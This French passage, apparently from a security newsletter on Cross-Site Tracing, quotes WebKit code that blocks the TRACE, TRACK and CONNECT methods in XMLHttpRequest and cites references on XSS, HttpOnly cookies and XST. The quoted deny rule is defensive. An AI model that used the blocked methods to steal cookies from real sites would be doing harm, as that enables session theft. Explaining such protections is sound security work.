Comme pour Firefox, l'interdiction est en dur dans le code :
Dans le fichier : ./third_party/WebKit/WebCore/xml/XMLHttpRequest.cpp
// Method names are case sensitive. But since Firefox uppercases method names it knows, we'll do the same.
String methodUpper(method.upper());
if (methodUpper == "TRACE" || methodUpper == "TRACK" || methodUpper == "CONNECT") {
ec = SECURITY_ERR;
return;
}
[XSS] http://www.hsc.fr/~thivillon/04_failles_xss.pdf
[MSHttpOnly] http://msdn.microsoft.com/fr-fr/library/system.web.httpcookie.httponly.aspx
[XST] http://www.kb.cert.org/vuls/id/867593
[Apache2] http://httpd.apache.org/docs/2.0/mod/core.html#traceenable
Plus d'informations sur la liste de diffusion newsletter